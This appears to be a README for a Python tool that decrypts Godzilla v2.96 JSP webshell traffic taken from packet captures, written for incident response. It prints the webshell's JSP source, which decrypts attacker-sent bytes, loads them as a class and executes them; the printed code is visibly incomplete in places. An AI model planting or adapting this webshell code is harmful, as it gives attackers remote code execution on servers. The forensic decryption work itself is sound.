
Decrypting Godzilla webshell management tool traffic

Primary LanguagePython


Decrypt Godzilla-V2.96 webshell management tool traffic

Currently only supports jsp type webshell traffic decryption


  1. Obtain the webshell sample uploaded to the server by the attacker 01decodeunicode.png
  2. Obtain traffic packages such as wireshark. Generally, Party A has a full-traffic mirroring device such as Kelai. Contact the operation and maintenance personnel to obtain it. Here, we take test.papng as an example. ![02wireshark package.png](./docs/02wireshark package.png)
  3. Export all http objects and place them in folders ![03Export object.png](./docs/03Export object.png) 04ExportObject.png
  4. Edit the kingkong.py script, find the line #config, and configure the obtained sample password, key, and the folder path just now
  5. py -2 kingkong.py ![](./docs/06Decrypted Traffic.png)


#Configure webshell key
key = '3c6e0b8a9c15224a'
#Configure the password of webshell
password = 'pass'
#Configure the path for wireshark to export http objects
filepath = '.'
#Whether the configuration is jsp+base64, set False to decrypt JAVA_AES_RAW traffic, set True to decrypt JAVA_AES_BASE64 traffic
isbase64 = False


  1. Format the generated webshell
String xc="3c6e0b8a9c15224a"; //md5("key")[0:16]
String pass="pass"; //get parameters
String md5=md5(pass+xc); //Response delimiter
class X extends ClassLoader
         public X(ClassLoader z)
         public Class Q(byte[] cb)
             return super.defineClass(cb, 0, cb.length);

     //aes decryption
     public byte[] x(byte[] s,boolean m)
             javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
             c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
             return c.doFinal(s);
             }catch (Exception e)
                 return null;
     //md5 16-digit uppercase
     public static String md5(String s) {
         String ret = null;
         try {
             java.security.MessageDigest m;
             m = java.security.MessageDigest.getInstance("MD5");
             m.update(s.getBytes(), 0, s.length());
             ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
             } catch (Exception e) {}
             return ret;

     //base64 encoding
     public static String base64Encode(byte[] bs) throws Exception
         Class base64;
         String value = null;
         try {
             Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
             value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) { try { base64=Class.forName("sun.misc.BASE64Encoder");
             Object Encoder = base64.newInstance();
             value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) { }}return value;

     //base64 decoding
     public static byte[] base64Decode(String bs) throws Exception
         Class base64;
             byte[] value = null;
         try {
                 Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
                 value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
         catch (Exception e)
             try {
                     Object decoder = base64.newInstance();
                     value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
             catch (Exception e2)

             return value;
         byte[] data=base64Decode(request.getParameter(pass));
         data=x(data, false);
         if (session.getAttribute("payload")==null)
             session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));
                     request.setAttribute("parameters", new String(data));
                     Object f=((Class)session.getAttribute("payload")).newInstance();
                     response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
     }catch (Exception e)

  1. You can see that there are mainly base64 encoding and decoding, aes decryption, and md5 hash functions. Focus on the key parameters:
String xc="3c6e0b8a9c15224a";
  1. This parameter is defined by the "key" parameter in the generated webshell. The specific value is:
  1. After the webshell client receives the instruction issued by the server, it performs base64 decoding. After the AES decryption process is completed, a response message is generated. The message structure is:
md5(pass+xc)[0:16]+base64 encoded Trojan execution result+md5(pass+xc)[16]